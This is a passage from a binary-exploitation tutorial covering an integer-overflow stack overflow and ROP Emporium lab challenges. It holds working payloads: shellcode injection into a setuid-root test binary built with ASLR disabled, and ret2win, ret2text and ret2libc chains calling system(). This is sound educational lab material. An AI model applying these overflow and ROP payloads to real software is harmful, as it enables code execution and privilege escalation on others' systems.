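This example takes two string arguments and computes their total length, and the program allocates what should be enough memory to hold the concatenated string. It copies the first argument into the buffer and then appends the second. If the total length of the two attacker-supplied strings cannot be represented in total, the value is truncated, which leads to the buffer overflow that follows.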
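For examples 2 and 3, the size that actually reaches malloc() can be computed directly. The Python 3 sketch below assumes a 32-bit size_t and a 16-bit unsigned short; the function names and the sample lengths are chosen only for illustration.

```python
def malloc_size(length, size_t_bits=32):
    """Size passed to malloc(len + 5) when len is a size_t (example 2)."""
    return (length + 5) % (1 << size_t_bits)

def total_as_ushort(len1, len2):
    """strlen(a) + strlen(b) + 1 stored in a 16-bit unsigned short (example 3)."""
    return (len1 + len2 + 1) & 0xFFFF

print(malloc_size(0xFFFFFFFF))         # tiny allocation, huge read() afterwards
print(total_as_ushort(40000, 30000))   # 70001 bytes needed, far fewer allocated
```

In both cases the allocation is computed from the wrapped or truncated value, while the copy that follows still uses the full attacker-controlled length.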
Hands-on
With the examples above in mind, let's actually exploit an integer overflow vulnerability. Source code
#include<stdio.h>
#include<string.h>
void validate_passwd(char *passwd) {
    char passwd_buf[11];
    unsigned char passwd_len = strlen(passwd);
    if(passwd_len >= 4 && passwd_len <= 8) {
        printf("good!\n");
        strcpy(passwd_buf, passwd);
    } else {
        printf("bad!\n");
    }
}
int main(int argc, char *argv[]) {
    if(argc != 2) {
        printf("error\n");
        return 0;
    }
    validate_passwd(argv[1]);
}
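In the program above, strlen() returns a size_t, but the result is stored in an unsigned char. Any length above the maximum value of an unsigned char (255) is truncated. When the password is 261 bytes long, the truncated value is 5 (261 mod 256), which passes the if check and leads to a stack overflow. Next we exploit the overflow to get a shell.
Compile commands: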
# echo 0 > /proc/sys/kernel/randomize_va_space
$ gcc -g -fno-stack-protector -z execstack vuln.c
$ sudo chown root vuln
$ sudo chgrp root vuln
$ sudo chmod +s vuln
Use gdb to disassemble the validate_passwd function.
gdb-peda$ disassemble validate_passwd
Dump of assembler code for function validate_passwd:
0x0000059d <+0>: push ebp ; save ebp on the stack
0x0000059e <+1>: mov ebp,esp
0x000005a0 <+3>: push ebx ; save ebx on the stack
0x000005a1 <+4>: sub esp,0x14
0x000005a4 <+7>: call 0x4a0 <__x86.get_pc_thunk.bx>
0x000005a9 <+12>: add ebx,0x1a57
0x000005af <+18>: sub esp,0xc
0x000005b2 <+21>: push DWORD PTR [ebp+0x8]
0x000005b5 <+24>: call 0x430 <strlen@plt>
0x000005ba <+29>: add esp,0x10
0x000005bd <+32>: mov BYTE PTR [ebp-0x9],al ; store len at [ebp-0x9]
0x000005c0 <+35>: cmp BYTE PTR [ebp-0x9],0x3
0x000005c4 <+39>: jbe 0x5f2 <validate_passwd+85>
0x000005c6 <+41>: cmp BYTE PTR [ebp-0x9],0x8
0x000005ca <+45>: ja 0x5f2 <validate_passwd+85>
0x000005cc <+47>: sub esp,0xc
0x000005cf <+50>: lea eax,[ebx-0x1910]
0x000005d5 <+56>: push eax
0x000005d6 <+57>: call 0x420 <puts@plt>
0x000005db <+62>: add esp,0x10
0x000005de <+65>: sub esp,0x8
0x000005e1 <+68>: push DWORD PTR [ebp+0x8]
0x000005e4 <+71>: lea eax,[ebp-0x14] ; take the address of passwd_buf
0x000005e7 <+74>: push eax ; push passwd_buf
0x000005e8 <+75>: call 0x410 <strcpy@plt>
0x000005ed <+80>: add esp,0x10
0x000005f0 <+83>: jmp 0x604 <validate_passwd+103>
0x000005f2 <+85>: sub esp,0xc
0x000005f5 <+88>: lea eax,[ebx-0x190a]
0x000005fb <+94>: push eax
0x000005fc <+95>: call 0x420 <puts@plt>
0x00000601 <+100>: add esp,0x10
0x00000604 <+103>: nop
0x00000605 <+104>: mov ebx,DWORD PTR [ebp-0x4]
0x00000608 <+107>: leave
0x00000609 <+108>: ret
End of assembler dump.
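Reading the disassembly, we see that the buffer passwd_buf is located at ebp-0x14 (0x000005e4 <+71>: lea eax,[ebp-0x14]) and the return address at ebp+4, so the return address is 0x14+4 = 0x18 bytes from the start of the buffer. Let's test that: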
gdb-peda$ r `python2 -c 'print "A"*24 + "B"*4 + "C"*233'`
Starting program: /home/a.out `python2 -c 'print "A"*24 + "B"*4 + "C"*233'`
good!
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xffffd0f4 ('A' <repeats 24 times>, "BBBB", 'C' <repeats 172 times>...)
EBX: 0x41414141 ('AAAA')
ECX: 0xffffd490 --> 0x534c0043 ('C')
EDX: 0xffffd1f8 --> 0xffff0043 --> 0x0
ESI: 0xf7f95000 --> 0x1bbd90
EDI: 0x0
EBP: 0x41414141 ('AAAA')
ESP: 0xffffd110 ('C' <repeats 200 times>...)
EIP: 0x42424242 ('BBBB')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x42424242
[------------------------------------stack-------------------------------------]
0000| 0xffffd110 ('C' <repeats 200 times>...)
0004| 0xffffd114 ('C' <repeats 200 times>...)
0008| 0xffffd118 ('C' <repeats 200 times>...)
0012| 0xffffd11c ('C' <repeats 200 times>...)
0016| 0xffffd120 ('C' <repeats 200 times>...)
0020| 0xffffd124 ('C' <repeats 200 times>...)
0024| 0xffffd128 ('C' <repeats 200 times>...)
0028| 0xffffd12c ('C' <repeats 200 times>...)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x42424242 in ?? ()
EIP has been overwritten with BBBB, which means we control the return address. Build the following payload:
from pwn import *
ret_addr = 0xffffd118 # ebp = 0xffffd108
shellcode = shellcraft.i386.sh()
payload = "A" * 24
payload += p32(ret_addr)
payload += "\x90" * 20
payload += asm(shellcode)
payload += "C" * 169 # 24 + 4 + 20 + 44 + 169 = 261
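The layout of that payload, and the reason its total length is 261, can be checked without pwntools. The Python 3 sketch below uses a 44-byte placeholder in place of the real shellcode (44 is the length implied by the comment in the payload above; the placeholder bytes are purely hypothetical) and verifies that strlen() of the result truncates to a value the if check accepts.

```python
import struct

def build_layout(ret_addr, shellcode, total_len=261):
    """Lay out the overflow string: filler, return address, NOP sled, code, padding."""
    payload = b"A" * 24                     # passwd_buf up to the saved return address
    payload += struct.pack("<I", ret_addr)  # overwritten return address (little endian)
    payload += b"\x90" * 20                 # NOP sled
    payload += shellcode
    pad = total_len - len(payload)
    if pad < 0:
        raise ValueError("shellcode too long for the chosen total length")
    return payload + b"C" * pad             # pad so the length truncates to 5

def truncated_len(n):
    """What ends up in `unsigned char passwd_len`."""
    return n & 0xFF

placeholder = b"\xcc" * 44  # hypothetical stand-in for asm(shellcode)
p = build_layout(0xffffd118, placeholder)
print(len(p), truncated_len(len(p)))
```

Any total length whose low byte lies between 4 and 8 would pass the check; 261 is simply the first such length that is large enough to hold the whole payload.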
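3.1.4 Return-Oriented Programming (ROP)
- Introduction to ROP
- ROP Emporium
- Further reading
Introduction to ROP
Return-Oriented Programming (ROP) is an advanced memory attack technique that lets an attacker execute code in the presence of the common defenses of modern operating systems, such as non-executable memory and code signing. These attacks usually exploit a bug that affects the call stack, typically a buffer overflow. The attacker takes control of the call stack to hijack the program's control flow and execute chosen machine instruction sequences (gadgets). Each gadget usually ends with a return instruction (ret, machine code c3) and lives inside a subroutine of the existing program or of shared library code. By executing these sequences, the attacker controls what the program does.
The ret instruction is equivalent to pop eip: it first reads the 4 bytes that esp points to and assigns them to eip, then adds 4 to esp so that it points to the next slot on the stack. If the instruction sequence now being executed also ends with ret, the process repeats: esp is incremented again and the next sequence runs.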
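How ret chains gadgets together can be illustrated with a toy model in Python 3. This is not an emulator: the stack is a list of words, each gadget is a short list of micro-operations, and the gadget addresses are invented for the example.

```python
def run_chain(stack, gadgets):
    """Tiny model of ret-driven execution.

    stack   : list of 32-bit words; index 0 is where esp points
    gadgets : dict mapping an address to a list of micro-ops
    """
    regs = {"eax": 0, "ebx": 0}
    esp = 0
    while esp < len(stack):
        eip = stack[esp]   # ret: pop the next address into eip
        esp += 1
        if eip not in gadgets:
            break          # a real process would crash here
        for op, *args in gadgets[eip]:
            if op == "pop":
                regs[args[0]] = stack[esp]
                esp += 1
            elif op == "add":
                regs[args[0]] = (regs[args[0]] + regs[args[1]]) & 0xFFFFFFFF
    return regs

# Hypothetical gadget addresses, chosen only for this illustration.
GADGETS = {
    0x1000: [("pop", "eax")],         # pop eax; ret
    0x2000: [("pop", "ebx")],         # pop ebx; ret
    0x3000: [("add", "eax", "ebx")],  # add eax,ebx; ret
}
chain = [0x1000, 40, 0x2000, 2, 0x3000]
print(run_chain(chain, GADGETS))
```

The chain interleaves gadget addresses with the data they pop, which is exactly the layout an attacker writes over the saved return address.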
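Finding gadgets
- Find every c3 (ret) byte in the program
- Search backwards from it to see whether the preceding bytes form valid instructions; a maximum number of bytes to search can be set to obtain gadgets of different lengths
- Record every valid instruction sequence found
In theory we could find gadgets this way ourselves, but in practice many tools do the job, such as ROPgadget and Ropper. For a more complete search, use http://ropshell.com/.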
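The first two steps of the search can be sketched in Python 3 as follows. The function only enumerates byte windows that end in c3; deciding whether a window decodes to valid instructions needs a disassembler, which is deliberately left out here, and the function name is hypothetical.

```python
def ret_candidates(code, max_len=5):
    """Yield (offset, raw_bytes) for every byte window ending in a c3 byte."""
    for end, byte in enumerate(code):
        if byte != 0xC3:
            continue
        # Walk backwards from the ret, one extra byte at a time.
        for length in range(1, max_len + 1):
            start = end - length
            if start < 0:
                break
            yield start, code[start:end + 1]

# pop eax; ret; nop; pop ebx; ret
sample = bytes.fromhex("58c3905bc3")
for offset, window in ret_candidates(sample, max_len=1):
    print(hex(offset), window.hex())
```

Tools such as ROPgadget and Ropper perform the same backward scan and then disassemble each window to keep only the valid sequences.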
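Commonly used gadgets
Gadgets can do almost anything you can think of. Here is a brief overview of several uses:
- Loading stack data into a register
  - Pops the value at the top of the stack into a register, then jumps to the address at the new top of the stack. So when the return address is overwritten with the address of a gadget, the program executes that instruction sequence after it returns.
  - For example: pop eax; ret
- Loading memory data into a register
  - Loads the data at a memory address into a register.
  - For example: mov ecx,[eax]; ret
- Storing register data to memory
  - Stores the value of a register at a memory address.
  - For example: mov [eax],ecx; ret
- Arithmetic and logic operations
  - add, sub, mul, xor, and so on.
  - For example: add eax,ebx; ret, xor edx,edx; ret
- System calls
  - Trigger a kernel interrupt.
  - For example: int 0x80; ret, call gs:[0x10]; ret
- Gadgets that affect the stack frame
  - These gadgets change the value of ebp and thereby affect the stack frame; operations such as a stack pivot need them to move the stack frame.
  - For example: leave; ret, pop ebp; ret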
ROP Emporium
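ROP Emporium offers a series of challenges for learning ROP. Each challenge introduces one concept and the difficulty rises gradually, which makes it good material for learning ROP step by step. ROP Emporium also focuses purely on ROP: every challenge has the same vulnerability, and only the construction of the ROP chain differs, so no other exploitation or reverse engineering is involved. Each challenge comes as both a 32-bit and a 64-bit binary, and comparing them helps us understand how ROP chains differ across architectures, for example in how arguments are passed. In this article we learn from these challenges.
Each challenge includes a flag.txt file, and our goal is to print its contents by controlling the program's execution. You can of course also try to get a shell.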
ret2win32
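Normally, for a program with a buffer overflow, we first enter enough characters to fill the buffer, followed by a carefully constructed ROP chain, and redirect execution by overwriting the return address saved on the stack (for buffer overflows, see the previous chapter, 3.1.3 Stack Overflow).
I will go through the first challenge in as much detail as I can, because all the challenge programs share a similar structure and the same buffer size. Let's look at the vulnerable function: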
gdb-peda$ disassemble pwnme
Dump of assembler code for function pwnme:
0x080485f6 <+0>: push ebp
0x080485f7 <+1>: mov ebp,esp
0x080485f9 <+3>: sub esp,0x28
0x080485fc <+6>: sub esp,0x4
0x080485ff <+9>: push 0x20
0x08048601 <+11>: push 0x0
0x08048603 <+13>: lea eax,[ebp-0x28]
0x08048606 <+16>: push eax
0x08048607 <+17>: call 0x8048460 <memset@plt>
0x0804860c <+22>: add esp,0x10
0x0804860f <+25>: sub esp,0xc
0x08048612 <+28>: push 0x804873c
0x08048617 <+33>: call 0x8048420 <puts@plt>
0x0804861c <+38>: add esp,0x10
0x0804861f <+41>: sub esp,0xc
0x08048622 <+44>: push 0x80487bc
0x08048627 <+49>: call 0x8048420 <puts@plt>
0x0804862c <+54>: add esp,0x10
0x0804862f <+57>: sub esp,0xc
0x08048632 <+60>: push 0x8048821
0x08048637 <+65>: call 0x8048400 <printf@plt>
0x0804863c <+70>: add esp,0x10
0x0804863f <+73>: mov eax,ds:0x804a060
0x08048644 <+78>: sub esp,0x4
0x08048647 <+81>: push eax
0x08048648 <+82>: push 0x32
0x0804864a <+84>: lea eax,[ebp-0x28]
0x0804864d <+87>: push eax
0x0804864e <+88>: call 0x8048410 <fgets@plt>
0x08048653 <+93>: add esp,0x10
0x08048656 <+96>: nop
0x08048657 <+97>: leave
0x08048658 <+98>: ret
End of assembler dump.
gdb-peda$ disassemble ret2win
Dump of assembler code for function ret2win:
0x08048659 <+0>: push ebp
0x0804865a <+1>: mov ebp,esp
0x0804865c <+3>: sub esp,0x8
0x0804865f <+6>: sub esp,0xc
0x08048662 <+9>: push 0x8048824
0x08048667 <+14>: call 0x8048400 <printf@plt>
0x0804866c <+19>: add esp,0x10
0x0804866f <+22>: sub esp,0xc
0x08048672 <+25>: push 0x8048841
0x08048677 <+30>: call 0x8048430 <system@plt>
0x0804867c <+35>: add esp,0x10
0x0804867f <+38>: nop
0x08048680 <+39>: leave
0x08048681 <+40>: ret
End of assembler dump.
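pwnme() is the function with the buffer overflow. It calls fgets() with a size limit of 0x32 = 50 bytes to read arbitrary data, but the buffer is only 40 bytes (0x0804864a <+84>: lea eax,[ebp-0x28], 0x28=40). Input longer than 40 bytes overwrites the caller's saved ebp and the return address: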
gdb-peda$ pattern_create 50
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA'
gdb-peda$ r
Starting program: /home/firmy/Desktop/rop_emporium/ret2win32/ret2win32
ret2win by ROP Emporium
32bits
For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;
What could possibly go wrong?
You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!
> AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
EAX: 0xffffd5c0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAb")
EBX: 0x0
ECX: 0xffffd5c0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAb")
EDX: 0xf7f90860 --> 0x0
ESI: 0xf7f8ee28 --> 0x1d1d30
EDI: 0x0
EBP: 0x41304141 ('AA0A')
ESP: 0xffffd5f0 --> 0xf7f80062 --> 0x41000000 ('')
EIP: 0x41414641 ('AFAA')
EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
Invalid $PC address: 0x41414641
[------------------------------------stack-------------------------------------]
0000| 0xffffd5f0 --> 0xf7f80062 --> 0x41000000 ('')
0004| 0xffffd5f4 --> 0xffffd610 --> 0x1
0008| 0xffffd5f8 --> 0x0
0012| 0xffffd5fc --> 0xf7dd57c3 (<__libc_start_main+243>: add esp,0x10)
0016| 0xffffd600 --> 0xf7f8ee28 --> 0x1d1d30
0020| 0xffffd604 --> 0xf7f8ee28 --> 0x1d1d30
0024| 0xffffd608 --> 0x0
0028| 0xffffd60c --> 0xf7dd57c3 (<__libc_start_main+243>: add esp,0x10)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x41414641 in ?? ()
gdb-peda$ pattern_offset $ebp
1093681473 found at offset: 40
gdb-peda$ pattern_offset $eip
1094796865 found at offset: 44
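The offsets from the start of the buffer to the saved ebp and to the return address (eip) are 40 and 44 respectively, which confirms our assumption.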
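The offset lookup can be reproduced by hand. The sketch below is only an illustration, not how peda implements pattern_offset: it packs the register value as little-endian bytes and searches for them in the pattern string copied from the session above. The helper name pattern_offset is reused here purely for readability.

```python
import struct

# Pattern string copied from the `pattern_create 50` output above.
PATTERN = b"AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA"

def pattern_offset(reg_value, width=4, pattern=PATTERN):
    """Return the offset in `pattern` of the bytes held in a register.

    x86 is little-endian, so the register value is packed
    least-significant byte first before searching.
    """
    fmt = "<I" if width == 4 else "<Q"
    needle = struct.pack(fmt, reg_value)
    return pattern.find(needle)

ebp_offset = pattern_offset(0x41304141)  # EBP held 'AA0A'
eip_offset = pattern_offset(0x41414641)  # EIP held 'AFAA'
print(ebp_offset, eip_offset)
```

The same helper with width=8 handles the 64-bit register values that appear later in this section.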
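Reading through the program logic, we see that the .text section contains a function ret2win() that is never called during normal execution. All we need to do is overwrite the return address with the address of this function so that the program jumps to it and prints the flag. This type of ROP is called ret2text.
Another important step is checksec: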
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : ENABLED
PIE : disabled
RELRO : Partial
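PIE is disabled here, so the load address of .text is fixed and we can use the address of ret2win(), 0x08048659, directly.
The payload is as follows (note: the payloads in this article are written in several different ways to demonstrate a range of tools):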
$ python2 -c "print 'A'*44 + '\x59\x86\x04\x08'" | ./ret2win32
...
> Thank you! Here's your flag:ROPE{a_placeholder_32byte_flag!}
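For readers without Python 2, the same payload can be sketched with only the standard library. This is a minimal Python 3 illustration; the constant and function names are chosen for this example, while the address and offset come from the analysis above.

```python
import struct

RET2WIN_ADDR = 0x08048659  # address of ret2win() from the disassembly
OFFSET_TO_RET = 44         # 40-byte buffer + 4-byte saved ebp

def build_ret2win32_payload():
    # Filler up to the saved return address, then the new return
    # address packed as a 32-bit little-endian integer.
    return b"A" * OFFSET_TO_RET + struct.pack("<I", RET2WIN_ADDR)

payload = build_ret2win32_payload()
```

Writing payload plus a trailing newline to sys.stdout.buffer and piping the result into ./ret2win32 should behave like the one-liner above, assuming the same binary.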
ret2win
Now for the 64-bit program:
gdb-peda$ disassemble pwnme
Dump of assembler code for function pwnme:
0x00000000004007b5 <+0>: push rbp
0x00000000004007b6 <+1>: mov rbp,rsp
0x00000000004007b9 <+4>: sub rsp,0x20
0x00000000004007bd <+8>: lea rax,[rbp-0x20]
0x00000000004007c1 <+12>: mov edx,0x20
0x00000000004007c6 <+17>: mov esi,0x0
0x00000000004007cb <+22>: mov rdi,rax
0x00000000004007ce <+25>: call 0x400600 <memset@plt>
0x00000000004007d3 <+30>: mov edi,0x4008f8
0x00000000004007d8 <+35>: call 0x4005d0 <puts@plt>
0x00000000004007dd <+40>: mov edi,0x400978
0x00000000004007e2 <+45>: call 0x4005d0 <puts@plt>
0x00000000004007e7 <+50>: mov edi,0x4009dd
0x00000000004007ec <+55>: mov eax,0x0
0x00000000004007f1 <+60>: call 0x4005f0 <printf@plt>
0x00000000004007f6 <+65>: mov rdx,QWORD PTR [rip+0x200873] # 0x601070 <stdin@@GLIBC_2.2.5>
0x00000000004007fd <+72>: lea rax,[rbp-0x20]
0x0000000000400801 <+76>: mov esi,0x32
0x0000000000400806 <+81>: mov rdi,rax
0x0000000000400809 <+84>: call 0x400620 <fgets@plt>
0x000000000040080e <+89>: nop
0x000000000040080f <+90>: leave
0x0000000000400810 <+91>: ret
End of assembler dump.
gdb-peda$ disassemble ret2win
Dump of assembler code for function ret2win:
0x0000000000400811 <+0>: push rbp
0x0000000000400812 <+1>: mov rbp,rsp
0x0000000000400815 <+4>: mov edi,0x4009e0
0x000000000040081a <+9>: mov eax,0x0
0x000000000040081f <+14>: call 0x4005f0 <printf@plt>
0x0000000000400824 <+19>: mov edi,0x4009fd
0x0000000000400829 <+24>: call 0x4005e0 <system@plt>
0x000000000040082e <+29>: nop
0x000000000040082f <+30>: pop rbp
0x0000000000400830 <+31>: ret
End of assembler dump.
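The first difference from 32-bit is argument passing: a 64-bit program passes its first six arguments in RDI, RSI, RDX, RCX, R8 and R9. The buffer address is therefore passed to fgets() in rdi (with the read length 0x32 in esi), and the buffer is 32 bytes long.
In addition, because the overwritten return address is not a valid address, the program stops at the instruction => 0x400810 <pwnme+91>: ret. On 64-bit, a usable user-space address cannot be greater than 0x00007fffffffffff; otherwise an exception is raised.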
gdb-peda$ r
Starting program: /home/firmy/Desktop/rop_emporium/ret2win/ret2win
ret2win by ROP Emporium
64bits
For my first trick, I will attempt to fit 50 bytes of user input into 32 bytes of stack buffer;
What could possibly go wrong?
You there madam, may I have your input please? And don't worry about null bytes, we're using fgets!
> AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA
Program received signal SIGSEGV, Segmentation fault.
[----------------------------------registers-----------------------------------]
RAX: 0x7fffffffe400 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAb")
RBX: 0x0
RCX: 0x1f
RDX: 0x7ffff7dd4710 --> 0x0
RSI: 0x7fffffffe400 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAb")
RDI: 0x7fffffffe401 ("AA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAb")
RBP: 0x6141414541412941 ('A)AAEAAa')
RSP: 0x7fffffffe428 ("AA0AAFAAb")
RIP: 0x400810 (<pwnme+91>: ret)
R8 : 0x0
R9 : 0x7ffff7fb94c0 (0x00007ffff7fb94c0)
R10: 0x602260 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA\n")
R11: 0x246
R12: 0x400650 (<_start>: xor ebp,ebp)
R13: 0x7fffffffe510 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x400809 <pwnme+84>: call 0x400620 <fgets@plt>
0x40080e <pwnme+89>: nop
0x40080f <pwnme+90>: leave
=> 0x400810 <pwnme+91>: ret
0x400811 <ret2win>: push rbp
0x400812 <ret2win+1>: mov rbp,rsp
0x400815 <ret2win+4>: mov edi,0x4009e0
0x40081a <ret2win+9>: mov eax,0x0
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe428 ("AA0AAFAAb")
0008| 0x7fffffffe430 --> 0x400062 --> 0x1f8000000000000
0016| 0x7fffffffe438 --> 0x7ffff7a41f6a (<__libc_start_main+234>: mov edi,eax)
0024| 0x7fffffffe440 --> 0x0
0032| 0x7fffffffe448 --> 0x7fffffffe518 --> 0x7fffffffe870 ("/home/firmy/Desktop/rop_emporium/ret2win/ret2win")
0040| 0x7fffffffe450 --> 0x100000000
0048| 0x7fffffffe458 --> 0x400746 (<main>: push rbp)
0056| 0x7fffffffe460 --> 0x0
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000400810 in pwnme ()
gdb-peda$ pattern_offset $rbp
7007954260868540737 found at offset: 32
gdb-peda$ pattern_offset AA0AAFAAb
AA0AAFAAb found at offset: 40
The address of ret2win() is 0x0000000000400811, and the payload is as follows:
from zio import *
payload = "A"*40 + l64(0x0000000000400811)
io = zio('./ret2win')
io.writeline(payload)
io.read()
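The reason the crash happens at ret rather than at a bogus RIP can be checked numerically. The sketch below assumes the common 48-bit virtual address layout of x86-64, where bits 47 to 63 of an address must all be equal; is_canonical is a helper name invented for this example.

```python
import struct

def is_canonical(addr):
    """True if bits 47..63 of a 64-bit address are all equal."""
    top = (addr & 0xFFFFFFFFFFFFFFFF) >> 47
    return top == 0 or top == 0x1FFFF

# The eight pattern bytes sitting at the top of the stack when ret faulted.
pattern_qword = struct.unpack("<Q", b"AA0AAFAA")[0]

# The real target is a valid address, packed as a 64-bit little-endian value.
ret2win_addr = 0x0000000000400811
payload = b"A" * 40 + struct.pack("<Q", ret2win_addr)

print(hex(pattern_qword), is_canonical(pattern_qword))
print(hex(ret2win_addr), is_canonical(ret2win_addr))
```

The pattern bytes decode to an address far above 0x00007fffffffffff, so the CPU faults on ret itself, whereas the address of ret2win() passes the check.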
split32
This challenge is also ret2text, but this time what we have is a function called usefulFunction():
gdb-peda$ disassemble usefulFunction
Dump of assembler code for function usefulFunction:
0x08048649 <+0>: push ebp
0x0804864a <+1>: mov ebp,esp
0x0804864c <+3>: sub esp,0x8
0x0804864f <+6>: sub esp,0xc
0x08048652 <+9>: push 0x8048747
0x08048657 <+14>: call 0x8048430 <system@plt>
0x0804865c <+19>: add esp,0x10
0x0804865f <+22>: nop
0x08048660 <+23>: leave
0x08048661 <+24>: ret
End of assembler dump.
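It calls system(). What we need to do is pass system() an argument of our own: a command that prints the flag when executed.
Use rabin2, a tool from radare2, to search for strings in the .data section: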
$ rabin2 -z split32
...
vaddr=0x0804a030 paddr=0x00001030 ordinal=000 sz=18 len=17 section=.data type=ascii string=/bin/cat flag.txt
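We find the string /bin/cat flag.txt, which is exactly what we need, at address 0x0804a030.
Now we build the payload. There are two approaches: one jumps directly to the instruction that calls system(), at 0x08048657; the other uses the PLT address of system(), 0x8048430. An earlier chapter (1.5.6 Dynamic Linking) covered the PLT's lazy binding mechanism, so here is a quick review.
Before binding: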
gdb-peda$ disassemble system
Dump of assembler code for function system@plt:
0x08048430 <+0>: jmp DWORD PTR ds:0x804a018
0x08048436 <+6>: push 0x18
0x0804843b <+11>: jmp 0x80483f0
gdb-peda$ x/5x 0x804a018
0x804a018: 0x08048436 0x08048446 0x08048456 0x08048466
0x804a028: 0x00000000
After binding:
gdb-peda$ disassemble system
Dump of assembler code for function system:
0xf7df9c50 <+0>: sub esp,0xc
0xf7df9c53 <+3>: mov eax,DWORD PTR [esp+0x10]
0xf7df9c57 <+7>: call 0xf7ef32cd <__x86.get_pc_thunk.dx>
0xf7df9c5c <+12>: add edx,0x1951cc
0xf7df9c62 <+18>: test eax,eax
0xf7df9c64 <+20>: je 0xf7df9c70 <system+32>
0xf7df9c66 <+22>: add esp,0xc
0xf7df9c69 <+25>: jmp 0xf7df9700 <do_system>
0xf7df9c6e <+30>: xchg ax,ax
0xf7df9c70 <+32>: lea eax,[edx-0x57616]
0xf7df9c76 <+38>: call 0xf7df9700 <do_system>
0xf7df9c7b <+43>: test eax,eax
0xf7df9c7d <+45>: sete al
0xf7df9c80 <+48>: add esp,0xc
0xf7df9c83 <+51>: movzx eax,al
0xf7df9c86 <+54>: ret
End of assembler dump.
gdb-peda$ x/5x 0x08048430
0x8048430 <system@plt>: 0xa01825ff 0x18680804 0xe9000000 0xffffffb0
0x8048440 <__libc_start_main@plt>: 0xa01c25ff
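Strictly speaking, this is not a very good illustration of the PLT: system() is used so frequently that it has already been bound before we call it. Later challenges include cases where the function has not been bound yet.
The two payloads are as follows: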
$ python2 -c "print 'A'*44 + '\x57\x86\x04\x08' + '\x30\xa0\x04\x08'" | ./split32
...
> ROPE{a_placeholder_32byte_flag!}
from zio import *
payload = "A"*44
payload += l32(0x08048430)
payload += "BBBB"
payload += l32(0x0804a030)
io = zio('./split32')
io.writeline(payload)
io.read()
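Note that "BBBB" is the new return address: when system() returns, execution continues at "BBBB". Usually the address of a gadget such as pop;pop;ret is placed here to balance the stack. This layout is also visible in system() itself: it first subtracts 0xc from esp and then reads the value at esp+0x10, which is the word right after "BBBB", that is, the address of the string. Because system() is a libc function, this technique is called ret2libc.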
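The stack layout described here (target function, fake return address, then arguments) can be captured in a small helper. This is a sketch using only the standard library; p32 and call32 are names chosen for this example, and 0x42424242 is simply "BBBB" written as an integer.

```python
import struct

def p32(value):
    """Pack a 32-bit little-endian integer."""
    return struct.pack("<I", value)

def call32(func_addr, ret_addr, *args):
    """Lay out a fake cdecl call: target, return address, then arguments."""
    frame = p32(func_addr) + p32(ret_addr)
    for arg in args:
        frame += p32(arg)
    return frame

SYSTEM_PLT = 0x08048430  # system@plt in split32
CAT_FLAG = 0x0804a030    # "/bin/cat flag.txt" in .data

payload = b"A" * 44 + call32(SYSTEM_PLT, 0x42424242, CAT_FLAG)
```

When the overwritten return address transfers control to system@plt, the callee sees the fake return address at esp and its first argument at esp+4, just as if it had been reached through a normal call.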
split
$ rabin2 -z split
...
vaddr=0x00601060 paddr=0x00001060 ordinal=000 sz=18 len=17 section=.data type=ascii string=/bin/cat flag.txt
The string is at address 0x00601060.
gdb-peda$ disassemble usefulFunction
Dump of assembler code for function usefulFunction:
0x0000000000400807 <+0>: push rbp
0x0000000000400808 <+1>: mov rbp,rsp
0x000000000040080b <+4>: mov edi,0x4008ff
0x0000000000400810 <+9>: call 0x4005e0 <system@plt>
0x0000000000400815 <+14>: nop
0x0000000000400816 <+15>: pop rbp
0x0000000000400817 <+16>: ret
End of assembler dump.
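A 64-bit program passes its first argument in rdi (edi is its low 32 bits), so we need one more gadget to load the address of the string into rdi.
First we find the gadget we need: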
gdb-peda$ ropsearch "pop rdi; ret"
Searching for ROP gadget: 'pop rdi; ret' in: binary ranges
0x00400883 : (b'5fc3') pop rdi; ret
Here is the payload:
$ python2 -c "print 'A'*40 + '\x83\x08\x40\x00\x00\x00\x00\x00' + '\x60\x10\x60\x00\x00\x00\x00\x00' + '\x10\x08\x40\x00\x00\x00\x00\x00'" | ./split
...
> ROPE{a_placeholder_32byte_flag!}
Can we still use the earlier approach and call the PLT address of system(), 0x4005e0?
gdb-peda$ disassemble system
Dump of assembler code for function system:
0x00007ffff7a63010 <+0>: test rdi,rdi
0x00007ffff7a63013 <+3>: je 0x7ffff7a63020 <system+16>
0x00007ffff7a63015 <+5>: jmp 0x7ffff7a62a70 <do_system>
0x00007ffff7a6301a <+10>: nop WORD PTR [rax+rax*1+0x0]
0x00007ffff7a63020 <+16>: lea rdi,[rip+0x138fd6] # 0x7ffff7b9bffd
0x00007ffff7a63027 <+23>: sub rsp,0x8
0x00007ffff7a6302b <+27>: call 0x7ffff7a62a70 <do_system>
0x00007ffff7a63030 <+32>: test eax,eax
0x00007ffff7a63032 <+34>: sete al
